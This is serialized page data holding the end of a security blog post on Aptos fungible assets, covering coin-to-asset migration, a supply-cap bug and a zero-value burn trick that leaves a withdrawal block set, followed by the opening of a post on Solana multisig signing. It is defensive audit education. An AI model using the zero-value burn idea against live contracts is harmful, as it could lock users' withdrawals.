tyle":238},[73916],{"type":33,"value":1123},{"type":27,"tag":207,"props":73918,"children":73919},{"style":220},[73920],{"type":33,"value":27578},{"type":27,"tag":207,"props":73922,"children":73923},{"style":238},[73924],{"type":33,"value":10449},{"type":27,"tag":207,"props":73926,"children":73927},{"class":209,"line":4103},[73928],{"type":27,"tag":207,"props":73929,"children":73930},{"style":238},[73931],{"type":33,"value":451},{"type":27,"tag":36,"props":73933,"children":73934},{},[73935],{"type":33,"value":73936},"At first glance, this code appears valid, but not to an astute reader.",{"type":27,"tag":73418,"props":73938,"children":73939},{},[73940,73945],{"type":27,"tag":36,"props":73941,"children":73942},{},[73943],{"type":33,"value":73944},"Can you spot the bug? Hint: We mentioned the root cause previously.",{"type":27,"tag":73449,"props":73946,"children":73947},{"v-slot:answer-0":7},[73948,73968],{"type":27,"tag":36,"props":73949,"children":73950},{},[73951,73953,73958,73960,73966],{"type":33,"value":73952},"The developer overlooked an important detail, which we already mentioned earlier: a fungible asset with a value of zero can also be burned! An attacker could exploit this by withdrawing 0 ",{"type":27,"tag":84,"props":73954,"children":73956},{"className":73955},[],[73957],{"type":33,"value":68743},{"type":33,"value":73959}," (since withdraw doesn’t verify if the value is greater than 0) and then burning it using ",{"type":27,"tag":84,"props":73961,"children":73963},{"className":73962},[],[73964],{"type":33,"value":73965},"fungible_asset::destroy_zero",{"type":33,"value":73967},". This would complete the transaction while keeping the \"blocked\" flag set, effectively preventing further withdrawals.",{"type":27,"tag":36,"props":73969,"children":73970},{},[73971],{"type":33,"value":73972},"It's important to understand all the features in the standard.",{"type":27,"tag":28,"props":73974,"children":73976},{"id":73975},"migrating-from-coins-to-fungible-assets",[73977],{"type":33,"value":73978},"Migrating from coins to fungible assets",{"type":27,"tag":36,"props":73980,"children":73981},{},[73982,73984,73989],{"type":33,"value":73983},"If a fungible asset is considered an upgrade to ",{"type":27,"tag":84,"props":73985,"children":73987},{"className":73986},[],[73988],{"type":33,"value":68198},{"type":33,"value":73990},", a transition mechanism becomes necessary. This is addressed through a conversion map, establishing a relationship between specific coin and fungible asset. This duality is not without its challenges.",{"type":27,"tag":73992,"props":73993,"children":73994},"note",{},[73995],{"type":27,"tag":36,"props":73996,"children":73997},{},[73998,74000,74005,74007,74012],{"type":33,"value":73999},"While the ",{"type":27,"tag":84,"props":74001,"children":74003},{"className":74002},[],[74004],{"type":33,"value":68198},{"type":33,"value":74006}," API recognizes and integrates with fungible assets, the fungible asset APIs do not have awareness of the linked ",{"type":27,"tag":84,"props":74008,"children":74010},{"className":74009},[],[74011],{"type":33,"value":68198},{"type":33,"value":1041},{"type":27,"tag":36,"props":74014,"children":74015},{},[74016,74017,74023,74025,74030,74032,74037],{"type":33,"value":23888},{"type":27,"tag":84,"props":74018,"children":74020},{"className":74019},[],[74021],{"type":33,"value":74022},"coin_to_fungible_asset",{"type":33,"value":74024}," converting function automatically generates a corresponding fungible asset for a ",{"type":27,"tag":84,"props":74026,"children":74028},{"className":74027},[],[74029],{"type":33,"value":68198},{"type":33,"value":74031}," if one does not already exist. Manual creation of a fungible asset and its linkage to a ",{"type":27,"tag":84,"props":74033,"children":74035},{"className":74034},[],[74036],{"type":33,"value":68198},{"type":33,"value":74038}," is not allowed.",{"type":27,"tag":101,"props":74040,"children":74042},{"className":10270,"code":74041,"language":10269,"meta":7,"style":7},"public fun coin_to_fungible_asset\u003CCoinType>(\n coin: Coin\u003CCoinType>\n): FungibleAsset acquires CoinConversionMap, CoinInfo {\n let metadata = ensure_paired_metadata\u003CCoinType>();\n let amount = burn_internal(coin);\n fungible_asset::mint_internal(metadata, amount)\n}\n",[74043],{"type":27,"tag":84,"props":74044,"children":74045},{"__ignoreMap":7},[74046,74074,74101,74137,74170,74203,74239],{"type":27,"tag":207,"props":74047,"children":74048},{"class":209,"line":210},[74049,74053,74057,74062,74066,74070],{"type":27,"tag":207,"props":74050,"children":74051},{"style":220},[74052],{"type":33,"value":68907},{"type":27,"tag":207,"props":74054,"children":74055},{"style":220},[74056],{"type":33,"value":13489},{"type":27,"tag":207,"props":74058,"children":74059},{"style":220},[74060],{"type":33,"value":74061}," coin_to_fungible_asset",{"type":27,"tag":207,"props":74063,"children":74064},{"style":238},[74065],{"type":33,"value":9257},{"type":27,"tag":207,"props":74067,"children":74068},{"style":8920},[74069],{"type":33,"value":13865},{"type":27,"tag":207,"props":74071,"children":74072},{"style":238},[74073],{"type":33,"value":13870},{"type":27,"tag":207,"props":74075,"children":74076},{"class":209,"line":244},[74077,74081,74085,74089,74093,74097],{"type":27,"tag":207,"props":74078,"children":74079},{"style":220},[74080],{"type":33,"value":68417},{"type":27,"tag":207,"props":74082,"children":74083},{"style":226},[74084],{"type":33,"value":736},{"type":27,"tag":207,"props":74086,"children":74087},{"style":8920},[74088],{"type":33,"value":13085},{"type":27,"tag":207,"props":74090,"children":74091},{"style":238},[74092],{"type":33,"value":9257},{"type":27,"tag":207,"props":74094,"children":74095},{"style":8920},[74096],{"type":33,"value":13865},{"type":27,"tag":207,"props":74098,"children":74099},{"style":238},[74100],{"type":33,"value":13274},{"type":27,"tag":207,"props":74102,"children":74103},{"class":209,"line":270},[74104,74108,74112,74116,74120,74125,74129,74133],{"type":27,"tag":207,"props":74105,"children":74106},{"style":238},[74107],{"type":33,"value":10416},{"type":27,"tag":207,"props":74109,"children":74110},{"style":226},[74111],{"type":33,"value":736},{"type":27,"tag":207,"props":74113,"children":74114},{"style":8920},[74115],{"type":33,"value":68772},{"type":27,"tag":207,"props":74117,"children":74118},{"style":220},[74119],{"type":33,"value":14849},{"type":27,"tag":207,"props":74121,"children":74122},{"style":8920},[74123],{"type":33,"value":74124}," CoinConversionMap",{"type":27,"tag":207,"props":74126,"children":74127},{"style":238},[74128],{"type":33,"value":1123},{"type":27,"tag":207,"props":74130,"children":74131},{"style":8920},[74132],{"type":33,"value":13995},{"type":27,"tag":207,"props":74134,"children":74135},{"style":238},[74136],{"type":33,"value":384},{"type":27,"tag":207,"props":74138,"children":74139},{"class":209,"line":296},[74140,74144,74149,74153,74158,74162,74166],{"type":27,"tag":207,"props":74141,"children":74142},{"style":214},[74143],{"type":33,"value":10290},{"type":27,"tag":207,"props":74145,"children":74146},{"style":220},[74147],{"type":33,"value":74148}," metadata",{"type":27,"tag":207,"props":74150,"children":74151},{"style":226},[74152],{"type":33,"value":229},{"type":27,"tag":207,"props":74154,"children":74155},{"style":220},[74156],{"type":33,"value":74157}," ensure_paired_metadata",{"type":27,"tag":207,"props":74159,"children":74160},{"style":238},[74161],{"type":33,"value":9257},{"type":27,"tag":207,"props":74163,"children":74164},{"style":8920},[74165],{"type":33,"value":13865},{"type":27,"tag":207,"props":74167,"children":74168},{"style":238},[74169],{"type":33,"value":15733},{"type":27,"tag":207,"props":74171,"children":74172},{"class":209,"line":445},[74173,74177,74182,74186,74191,74195,74199],{"type":27,"tag":207,"props":74174,"children":74175},{"style":214},[74176],{"type":33,"value":10290},{"type":27,"tag":207,"props":74178,"children":74179},{"style":220},[74180],{"type":33,"value":74181}," amount",{"type":27,"tag":207,"props":74183,"children":74184},{"style":226},[74185],{"type":33,"value":229},{"type":27,"tag":207,"props":74187,"children":74188},{"style":1335},[74189],{"type":33,"value":74190}," burn_internal",{"type":27,"tag":207,"props":74192,"children":74193},{"style":238},[74194],{"type":33,"value":1343},{"type":27,"tag":207,"props":74196,"children":74197},{"style":220},[74198],{"type":33,"value":68165},{"type":27,"tag":207,"props":74200,"children":74201},{"style":238},[74202],{"type":33,"value":1455},{"type":27,"tag":207,"props":74204,"children":74205},{"class":209,"line":867},[74206,74210,74214,74219,74223,74227,74231,74235],{"type":27,"tag":207,"props":74207,"children":74208},{"style":238},[74209],{"type":33,"value":73193},{"type":27,"tag":207,"props":74211,"children":74212},{"style":226},[74213],{"type":33,"value":10768},{"type":27,"tag":207,"props":74215,"children":74216},{"style":1335},[74217],{"type":33,"value":74218},"mint_internal",{"type":27,"tag":207,"props":74220,"children":74221},{"style":238},[74222],{"type":33,"value":1343},{"type":27,"tag":207,"props":74224,"children":74225},{"style":220},[74226],{"type":33,"value":69544},{"type":27,"tag":207,"props":74228,"children":74229},{"style":238},[74230],{"type":33,"value":1123},{"type":27,"tag":207,"props":74232,"children":74233},{"style":220},[74234],{"type":33,"value":27578},{"type":27,"tag":207,"props":74236,"children":74237},{"style":238},[74238],{"type":33,"value":10449},{"type":27,"tag":207,"props":74240,"children":74241},{"class":209,"line":892},[74242],{"type":27,"tag":207,"props":74243,"children":74244},{"style":238},[74245],{"type":33,"value":451},{"type":27,"tag":36,"props":74247,"children":74248},{},[74249,74251,74258],{"type":33,"value":74250},"When creating a fungible asset, several pieces of information are required, such as the asset’s name, symbol, or maximum supply. During our audit of the fungible asset standard, we ",{"type":27,"tag":47,"props":74252,"children":74255},{"href":74253,"rel":74254},"https://github.com/aptos-labs/aptos-core/commit/e5f4b62b237dad4d15069d3bb0b551b2df04bf08",[51],[74256],{"type":33,"value":74257},"noticed an overlooked detail",{"type":33,"value":74259}," in the linking process.",{"type":27,"tag":101,"props":74261,"children":74263},{"className":10270,"code":74262,"language":10269,"meta":7,"style":7},"[...]\nprimary_fungible_store::create_primary_store_enabled_fungible_asset(\n &metadata_object_cref,\n option::map(coin_supply\u003CCoinType>(), |_| MAX_U128),\n name\u003CCoinType>(),\n symbol\u003CCoinType>(),\n decimals\u003CCoinType>(),\n string::utf8(b\"\"),\n string::utf8(b\"\"),\n);\n[...]\n",[74264],{"type":27,"tag":84,"props":74265,"children":74266},{"__ignoreMap":7},[74267,74282,74302,74319,74375,74396,74416,74436,74466,74493,74500],{"type":27,"tag":207,"props":74268,"children":74269},{"class":209,"line":210},[74270,74274,74278],{"type":27,"tag":207,"props":74271,"children":74272},{"style":238},[74273],{"type":33,"value":11019},{"type":27,"tag":207,"props":74275,"children":74276},{"style":226},[74277],{"type":33,"value":16867},{"type":27,"tag":207,"props":74279,"children":74280},{"style":238},[74281],{"type":33,"value":19050},{"type":27,"tag":207,"props":74283,"children":74284},{"class":209,"line":244},[74285,74289,74293,74298],{"type":27,"tag":207,"props":74286,"children":74287},{"style":238},[74288],{"type":33,"value":69841},{"type":27,"tag":207,"props":74290,"children":74291},{"style":226},[74292],{"type":33,"value":10768},{"type":27,"tag":207,"props":74294,"children":74295},{"style":1335},[74296],{"type":33,"value":74297},"create_primary_store_enabled_fungible_asset",{"type":27,"tag":207,"props":74299,"children":74300},{"style":238},[74301],{"type":33,"value":9090},{"type":27,"tag":207,"props":74303,"children":74304},{"class":209,"line":270},[74305,74310,74315],{"type":27,"tag":207,"props":74306,"children":74307},{"style":226},[74308],{"type":33,"value":74309}," &",{"type":27,"tag":207,"props":74311,"children":74312},{"style":220},[74313],{"type":33,"value":74314},"metadata_object_cref",{"type":27,"tag":207,"props":74316,"children":74317},{"style":238},[74318],{"type":33,"value":1842},{"type":27,"tag":207,"props":74320,"children":74321},{"class":209,"line":296},[74322,74327,74331,74336,74340,74345,74349,74353,74358,74362,74366,74370],{"type":27,"tag":207,"props":74323,"children":74324},{"style":238},[74325],{"type":33,"value":74326}," option",{"type":27,"tag":207,"props":74328,"children":74329},{"style":226},[74330],{"type":33,"value":10768},{"type":27,"tag":207,"props":74332,"children":74333},{"style":1335},[74334],{"type":33,"value":74335},"map",{"type":27,"tag":207,"props":74337,"children":74338},{"style":238},[74339],{"type":33,"value":1343},{"type":27,"tag":207,"props":74341,"children":74342},{"style":220},[74343],{"type":33,"value":74344},"coin_supply",{"type":27,"tag":207,"props":74346,"children":74347},{"style":238},[74348],{"type":33,"value":9257},{"type":27,"tag":207,"props":74350,"children":74351},{"style":8920},[74352],{"type":33,"value":13865},{"type":27,"tag":207,"props":74354,"children":74355},{"style":238},[74356],{"type":33,"value":74357},">(), ",{"type":27,"tag":207,"props":74359,"children":74360},{"style":226},[74361],{"type":33,"value":17693},{"type":27,"tag":207,"props":74363,"children":74364},{"style":220},[74365],{"type":33,"value":10371},{"type":27,"tag":207,"props":74367,"children":74368},{"style":226},[74369],{"type":33,"value":17693},{"type":27,"tag":207,"props":74371,"children":74372},{"style":238},[74373],{"type":33,"value":74374}," MAX_U128),\n",{"type":27,"tag":207,"props":74376,"children":74377},{"class":209,"line":445},[74378,74383,74387,74391],{"type":27,"tag":207,"props":74379,"children":74380},{"style":220},[74381],{"type":33,"value":74382}," name",{"type":27,"tag":207,"props":74384,"children":74385},{"style":238},[74386],{"type":33,"value":9257},{"type":27,"tag":207,"props":74388,"children":74389},{"style":8920},[74390],{"type":33,"value":13865},{"type":27,"tag":207,"props":74392,"children":74393},{"style":238},[74394],{"type":33,"value":74395},">(),\n",{"type":27,"tag":207,"props":74397,"children":74398},{"class":209,"line":867},[74399,74404,74408,74412],{"type":27,"tag":207,"props":74400,"children":74401},{"style":220},[74402],{"type":33,"value":74403}," symbol",{"type":27,"tag":207,"props":74405,"children":74406},{"style":238},[74407],{"type":33,"value":9257},{"type":27,"tag":207,"props":74409,"children":74410},{"style":8920},[74411],{"type":33,"value":13865},{"type":27,"tag":207,"props":74413,"children":74414},{"style":238},[74415],{"type":33,"value":74395},{"type":27,"tag":207,"props":74417,"children":74418},{"class":209,"line":892},[74419,74424,74428,74432],{"type":27,"tag":207,"props":74420,"children":74421},{"style":220},[74422],{"type":33,"value":74423}," decimals",{"type":27,"tag":207,"props":74425,"children":74426},{"style":238},[74427],{"type":33,"value":9257},{"type":27,"tag":207,"props":74429,"children":74430},{"style":8920},[74431],{"type":33,"value":13865},{"type":27,"tag":207,"props":74433,"children":74434},{"style":238},[74435],{"type":33,"value":74395},{"type":27,"tag":207,"props":74437,"children":74438},{"class":209,"line":1475},[74439,74444,74448,74453,74457,74462],{"type":27,"tag":207,"props":74440,"children":74441},{"style":238},[74442],{"type":33,"value":74443}," string",{"type":27,"tag":207,"props":74445,"children":74446},{"style":226},[74447],{"type":33,"value":10768},{"type":27,"tag":207,"props":74449,"children":74450},{"style":1335},[74451],{"type":33,"value":74452},"utf8",{"type":27,"tag":207,"props":74454,"children":74455},{"style":238},[74456],{"type":33,"value":1343},{"type":27,"tag":207,"props":74458,"children":74459},{"style":1325},[74460],{"type":33,"value":74461},"b\"\"",{"type":27,"tag":207,"props":74463,"children":74464},{"style":238},[74465],{"type":33,"value":14018},{"type":27,"tag":207,"props":74467,"children":74468},{"class":209,"line":2065},[74469,74473,74477,74481,74485,74489],{"type":27,"tag":207,"props":74470,"children":74471},{"style":238},[74472],{"type":33,"value":74443},{"type":27,"tag":207,"props":74474,"children":74475},{"style":226},[74476],{"type":33,"value":10768},{"type":27,"tag":207,"props":74478,"children":74479},{"style":1335},[74480],{"type":33,"value":74452},{"type":27,"tag":207,"props":74482,"children":74483},{"style":238},[74484],{"type":33,"value":1343},{"type":27,"tag":207,"props":74486,"children":74487},{"style":1325},[74488],{"type":33,"value":74461},{"type":27,"tag":207,"props":74490,"children":74491},{"style":238},[74492],{"type":33,"value":14018},{"type":27,"tag":207,"props":74494,"children":74495},{"class":209,"line":2092},[74496],{"type":27,"tag":207,"props":74497,"children":74498},{"style":238},[74499],{"type":33,"value":1455},{"type":27,"tag":207,"props":74501,"children":74502},{"class":209,"line":2130},[74503,74507,74511],{"type":27,"tag":207,"props":74504,"children":74505},{"style":238},[74506],{"type":33,"value":11019},{"type":27,"tag":207,"props":74508,"children":74509},{"style":226},[74510],{"type":33,"value":16867},{"type":27,"tag":207,"props":74512,"children":74513},{"style":238},[74514],{"type":33,"value":19050},{"type":27,"tag":36,"props":74516,"children":74517},{},[74518,74520,74525],{"type":33,"value":74519},"When the linked fungible asset was created, the current ",{"type":27,"tag":84,"props":74521,"children":74523},{"className":74522},[],[74524],{"type":33,"value":68198},{"type":33,"value":74526}," supply was incorrectly passed as the maximum fungible asset supply, preventing the minting of additional fungible assets beyond the existing coin circulation.",{"type":27,"tag":36,"props":74528,"children":74529},{},[74530,74532,74537,74539,74545,74547,74552],{"type":33,"value":74531},"Users can manually migrate their ",{"type":27,"tag":84,"props":74533,"children":74535},{"className":74534},[],[74536],{"type":33,"value":68360},{"type":33,"value":74538}," to a primary fungible store. This creates a store for the paired fungible asset (if one doesn’t exist) and removes the ",{"type":27,"tag":84,"props":74540,"children":74542},{"className":74541},[],[74543],{"type":33,"value":74544},"\u003CCoinStore\u003CCoinType>>",{"type":33,"value":74546}," from the caller. All coins in the ",{"type":27,"tag":84,"props":74548,"children":74550},{"className":74549},[],[74551],{"type":33,"value":68360},{"type":33,"value":74553}," are exchanged and transferred to the new store during the migration.",{"type":27,"tag":101,"props":74555,"children":74557},{"className":10270,"code":74556,"language":10269,"meta":7,"style":7},"/// Voluntarily migrate to fungible store for `CoinType` if not yet.\npublic entry fun migrate_to_fungible_store\u003CCoinType>(\n account: &signer\n) acquires CoinStore, CoinConversionMap, CoinInfo {\n maybe_convert_to_fungible_store\u003CCoinType>(signer::address_of(account));\n}\n",[74558],{"type":27,"tag":84,"props":74559,"children":74560},{"__ignoreMap":7},[74561,74569,74601,74621,74657,74698],{"type":27,"tag":207,"props":74562,"children":74563},{"class":209,"line":210},[74564],{"type":27,"tag":207,"props":74565,"children":74566},{"style":4647},[74567],{"type":33,"value":74568},"/// Voluntarily migrate to fungible store for `CoinType` if not yet.\n",{"type":27,"tag":207,"props":74570,"children":74571},{"class":209,"line":244},[74572,74576,74580,74584,74589,74593,74597],{"type":27,"tag":207,"props":74573,"children":74574},{"style":220},[74575],{"type":33,"value":68907},{"type":27,"tag":207,"props":74577,"children":74578},{"style":220},[74579],{"type":33,"value":69874},{"type":27,"tag":207,"props":74581,"children":74582},{"style":220},[74583],{"type":33,"value":13489},{"type":27,"tag":207,"props":74585,"children":74586},{"style":220},[74587],{"type":33,"value":74588}," migrate_to_fungible_store",{"type":27,"tag":207,"props":74590,"children":74591},{"style":238},[74592],{"type":33,"value":9257},{"type":27,"tag":207,"props":74594,"children":74595},{"style":8920},[74596],{"type":33,"value":13865},{"type":27,"tag":207,"props":74598,"children":74599},{"style":238},[74600],{"type":33,"value":13870},{"type":27,"tag":207,"props":74602,"children":74603},{"class":209,"line":270},[74604,74608,74612,74616],{"type":27,"tag":207,"props":74605,"children":74606},{"style":220},[74607],{"type":33,"value":32436},{"type":27,"tag":207,"props":74609,"children":74610},{"style":226},[74611],{"type":33,"value":736},{"type":27,"tag":207,"props":74613,"children":74614},{"style":226},[74615],{"type":33,"value":14423},{"type":27,"tag":207,"props":74617,"children":74618},{"style":220},[74619],{"type":33,"value":74620},"signer\n",{"type":27,"tag":207,"props":74622,"children":74623},{"class":209,"line":296},[74624,74628,74632,74636,74640,74645,74649,74653],{"type":27,"tag":207,"props":74625,"children":74626},{"style":238},[74627],{"type":33,"value":2222},{"type":27,"tag":207,"props":74629,"children":74630},{"style":220},[74631],{"type":33,"value":13626},{"type":27,"tag":207,"props":74633,"children":74634},{"style":8920},[74635],{"type":33,"value":68381},{"type":27,"tag":207,"props":74637,"children":74638},{"style":238},[74639],{"type":33,"value":1123},{"type":27,"tag":207,"props":74641,"children":74642},{"style":8920},[74643],{"type":33,"value":74644},"CoinConversionMap",{"type":27,"tag":207,"props":74646,"children":74647},{"style":238},[74648],{"type":33,"value":1123},{"type":27,"tag":207,"props":74650,"children":74651},{"style":8920},[74652],{"type":33,"value":13995},{"type":27,"tag":207,"props":74654,"children":74655},{"style":238},[74656],{"type":33,"value":384},{"type":27,"tag":207,"props":74658,"children":74659},{"class":209,"line":445},[74660,74665,74669,74673,74678,74682,74686,74690,74694],{"type":27,"tag":207,"props":74661,"children":74662},{"style":220},[74663],{"type":33,"value":74664}," maybe_convert_to_fungible_store",{"type":27,"tag":207,"props":74666,"children":74667},{"style":238},[74668],{"type":33,"value":9257},{"type":27,"tag":207,"props":74670,"children":74671},{"style":8920},[74672],{"type":33,"value":13865},{"type":27,"tag":207,"props":74674,"children":74675},{"style":238},[74676],{"type":33,"value":74677},">(signer",{"type":27,"tag":207,"props":74679,"children":74680},{"style":226},[74681],{"type":33,"value":10768},{"type":27,"tag":207,"props":74683,"children":74684},{"style":1335},[74685],{"type":33,"value":14491},{"type":27,"tag":207,"props":74687,"children":74688},{"style":238},[74689],{"type":33,"value":1343},{"type":27,"tag":207,"props":74691,"children":74692},{"style":220},[74693],{"type":33,"value":20230},{"type":27,"tag":207,"props":74695,"children":74696},{"style":238},[74697],{"type":33,"value":14505},{"type":27,"tag":207,"props":74699,"children":74700},{"class":209,"line":867},[74701],{"type":27,"tag":207,"props":74702,"children":74703},{"style":238},[74704],{"type":33,"value":451},{"type":27,"tag":36,"props":74706,"children":74707},{},[74708,74710,74715,74717,74722],{"type":33,"value":74709},"A curious reader might wonder about the fate of the ",{"type":27,"tag":84,"props":74711,"children":74713},{"className":74712},[],[74714],{"type":33,"value":68360},{"type":33,"value":74716}," \"frozen\" status during migration. Unsurprisingly tough, the \"frozen\" status of the primary fungible store is matched to that of the ",{"type":27,"tag":84,"props":74718,"children":74720},{"className":74719},[],[74721],{"type":33,"value":68360},{"type":33,"value":74723}," to ensure consistency.",{"type":27,"tag":73418,"props":74725,"children":74726},{},[74727,74746],{"type":27,"tag":36,"props":74728,"children":74729},{},[74730,74732,74737,74739,74744],{"type":33,"value":74731},"Could an attacker convert their ",{"type":27,"tag":84,"props":74733,"children":74735},{"className":74734},[],[74736],{"type":33,"value":68360},{"type":33,"value":74738}," to a primary fungible store and then register another ",{"type":27,"tag":84,"props":74740,"children":74742},{"className":74741},[],[74743],{"type":33,"value":68360},{"type":33,"value":74745}," only to convert it again to manipulate the \"frozen\" status of the linked primary fungible store?",{"type":27,"tag":73449,"props":74747,"children":74748},{"v-slot:answer-0":7},[74749],{"type":27,"tag":36,"props":74750,"children":74751},{},[74752],{"type":33,"value":74753},"The coin::register function first checks is_account_registered, which exits early if true. is_account_registered determines if the account has a primary fungible store for the linked fungible asset when the CoinStore doesn’t exist. If the fungible store has been converted, a primary fungible store and linked fungible asset will already exist, preventing re-registration.",{"type":27,"tag":28,"props":74755,"children":74756},{"id":10112},[74757],{"type":33,"value":10115},{"type":27,"tag":36,"props":74759,"children":74760},{},[74761,74763,74768],{"type":33,"value":74762},"Aptos's implementation of fungible assets does indeed resolve the original problems with ",{"type":27,"tag":84,"props":74764,"children":74766},{"className":74765},[],[74767],{"type":33,"value":68198},{"type":33,"value":1041},{"type":27,"tag":36,"props":74770,"children":74771},{},[74772],{"type":33,"value":74773},"However, this solution comes with its own challenges, in part because of the numerous layers that interact with each other. Before using the fungible asset standard, it's important to understand these different APIs and potential pitfalls.",{"type":27,"tag":36,"props":74775,"children":74776},{},[74777,74779],{"type":33,"value":74778},"As a final exercise to the reader, how many different ways are there to withdraw a fungible asset?",{"type":27,"tag":22749,"props":74780,"children":74781},{},[74782],{"type":27,"tag":47,"props":74783,"children":74785},{"href":36885,"ariaDescribedBy":74784,"dataFootnoteRef":7,"id":36887},[22756],[74786],{"type":33,"value":1651},{"type":27,"tag":25692,"props":74788,"children":74790},{"className":74789,"dataFootnotes":7},[25695],[74791,74796],{"type":27,"tag":28,"props":74792,"children":74794},{"className":74793,"id":22756},[25700],[74795],{"type":33,"value":25703},{"type":27,"tag":12719,"props":74797,"children":74798},{},[74799],{"type":27,"tag":1232,"props":74800,"children":74801},{"id":37627},[74802,74804,74846],{"type":33,"value":74803},"There are at least four functions that can withdraw a fungible asset:",{"type":27,"tag":1228,"props":74805,"children":74806},{},[74807,74817,74826,74836],{"type":27,"tag":1232,"props":74808,"children":74809},{},[74810],{"type":27,"tag":47,"props":74811,"children":74815},{"href":74812,"rel":74813,":style":74814},"https://github.com/aptos-labs/aptos-core/blob/81a2f4268b9e0f25cb6e1ce5c28bba0a34c27604/aptos-move/framework/aptos-framework/sources/fungible_asset.move#L782",[51],"color: #007bff;",[74816],{"type":33,"value":71499},{"type":27,"tag":1232,"props":74818,"children":74819},{},[74820],{"type":27,"tag":47,"props":74821,"children":74824},{"href":74822,"rel":74823,":style":74814},"https://github.com/aptos-labs/aptos-core/blob/main/aptos-move/framework/aptos-framework/sources/dispatchable_fungible_asset.move#L74",[51],[74825],{"type":33,"value":73439},{"type":27,"tag":1232,"props":74827,"children":74828},{},[74829],{"type":27,"tag":47,"props":74830,"children":74833},{"href":74831,"rel":74832,":style":74814},"https://github.com/aptos-labs/aptos-core/blob/81a2f4268b9e0f25cb6e1ce5c28bba0a34c27604/aptos-move/framework/aptos-framework/sources/primary_fungible_store.move#L157",[51],[74834],{"type":33,"value":74835},"primary_fungible_store::withdraw",{"type":27,"tag":1232,"props":74837,"children":74838},{},[74839],{"type":27,"tag":47,"props":74840,"children":74843},{"href":74841,"rel":74842,":style":74814},"https://github.com/aptos-labs/aptos-core/blob/main/aptos-move/framework/aptos-framework/sources/coin.move#L1091-L1098",[51],[74844],{"type":33,"value":74845},"coin::withdraw",{"type":27,"tag":47,"props":74847,"children":74849},{"href":37655,"ariaLabel":25805,"className":74848,"dataFootnoteBackref":7},[25807],[74850],{"type":33,"value":25810},{"type":27,"tag":10127,"props":74852,"children":74853},{},[74854],{"type":33,"value":10131},{"title":7,"searchDepth":244,"depth":244,"links":74856},[74857,74858,74859,74862,74867,74868,74869,74870],{"id":68184,"depth":244,"text":68187},{"id":68729,"depth":244,"text":68732},{"id":69289,"depth":244,"text":69292,"children":74860},[74861],{"id":69800,"depth":270,"text":69803},{"id":70057,"depth":244,"text":70060,"children":74863},[74864,74865,74866],{"id":70100,"depth":270,"text":70103},{"id":70805,"depth":270,"text":70808},{"id":72463,"depth":270,"text":72466},{"id":72994,"depth":244,"text":72997},{"id":73975,"depth":244,"text":73978},{"id":10112,"depth":244,"text":10115},{"id":22756,"depth":244,"text":25703},"content:blog:2025-02-10-hitchhikers-guide-to-aptos-fungible-assets.md","blog/2025-02-10-hitchhikers-guide-to-aptos-fungible-assets.md","blog/2025-02-10-hitchhikers-guide-to-aptos-fungible-assets",{"_path":74875,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":74876,"description":74877,"date":74878,"author":13003,"image":74879,"isFeatured":19,"onBlogPage":19,"tags":74881,"body":74882,"_type":10152,"_id":76710,"_source":10154,"_file":76711,"_stem":76712,"_extension":10157},"/blog/2025-02-22-multisig-security","Solana Multisig Security","What can teams do if their multisig signers are compromised? We explore Solana's transaction signing model and present a procedure for safe signing in the presence of malicious signers on Solana.","2025-02-22",{"src":74880,"width":12667,"height":12668},"/posts/multisig-security/title.png",[10169],{"type":24,"children":74883,"toc":76701},[74884,74897,74903,74908,74914,74927,74935,74948,75008,75030,75157,75162,75175,75187,75193,75207,75220,75234,75716,75721,75729,75743,75757,75896,75908,75914,75919,75937,75942,75947,75968,76252,76267,76455,76468,76597,76602,76607,76612,76640,76646,76651,76665,76697],{"type":27,"tag":36,"props":74885,"children":74886},{},[74887,74888,74895],{"type":33,"value":23888},{"type":27,"tag":47,"props":74889,"children":74892},{"href":74890,"rel":74891},"https://www.securityalliance.org/news/2025-02-dprk-advisory",[51],[74893],{"type":33,"value":74894},"Bybit hack",{"type":33,"value":74896}," raises an interesting question: what can teams do if their signers are compromised?",{"type":27,"tag":28,"props":74898,"children":74900},{"id":74899},"solana-signatures",[74901],{"type":33,"value":74902},"Solana Signatures",{"type":27,"tag":36,"props":74904,"children":74905},{},[74906],{"type":33,"value":74907},"We first need to understand how Solana signatures work. There are two ways to sign a Solana transaction.",{"type":27,"tag":58,"props":74909,"children":74911},{"id":74910},"recent-blockhash",[74912],{"type":33,"value":74913},"Recent Blockhash",{"type":27,"tag":36,"props":74915,"children":74916},{},[74917,74919,74926],{"type":33,"value":74918},"The most straightforward is with a \"recent blockhash\". From ",{"type":27,"tag":47,"props":74920,"children":74923},{"href":74921,"rel":74922},"https://solana.com/developers/guides/advanced/confirmation",[51],[74924],{"type":33,"value":74925},"the docs",{"type":33,"value":736},{"type":27,"tag":10222,"props":74928,"children":74929},{},[74930],{"type":27,"tag":36,"props":74931,"children":74932},{},[74933],{"type":33,"value":74934},"During transaction processing, Solana Validators will check if each transaction's recent blockhash is recorded within the most recent 151 stored hashes (aka \"max processing age\"). If the transaction's recent blockhash is older than this max processing age, the transaction is not processed.",{"type":27,"tag":36,"props":74936,"children":74937},{},[74938,74940,74947],{"type":33,"value":74939},"The actual constant ",{"type":27,"tag":47,"props":74941,"children":74944},{"href":74942,"rel":74943},"https://github.com/anza-xyz/agave/blob/c1080de464cfb578c301e975f498964b5d5313db/sdk/clock/src/lib.rs#L129-L130",[51],[74945],{"type":33,"value":74946},"is defined here",{"type":33,"value":1041},{"type":27,"tag":101,"props":74949,"children":74951},{"className":10270,"code":74950,"language":10269,"meta":7,"style":7},"// The maximum age of a blockhash that will be accepted by the leader\npub const MAX_PROCESSING_AGE: usize = MAX_RECENT_BLOCKHASHES / 2;\n",[74952],{"type":27,"tag":84,"props":74953,"children":74954},{"__ignoreMap":7},[74955,74963],{"type":27,"tag":207,"props":74956,"children":74957},{"class":209,"line":210},[74958],{"type":27,"tag":207,"props":74959,"children":74960},{"style":4647},[74961],{"type":33,"value":74962},"// The maximum age of a blockhash that will be accepted by the leader\n",{"type":27,"tag":207,"props":74964,"children":74965},{"class":209,"line":244},[74966,74970,74974,74979,74983,74987,74991,74996,75000,75004],{"type":27,"tag":207,"props":74967,"children":74968},{"style":214},[74969],{"type":33,"value":20967},{"type":27,"tag":207,"props":74971,"children":74972},{"style":214},[74973],{"type":33,"value":46357},{"type":27,"tag":207,"props":74975,"children":74976},{"style":238},[74977],{"type":33,"value":74978}," 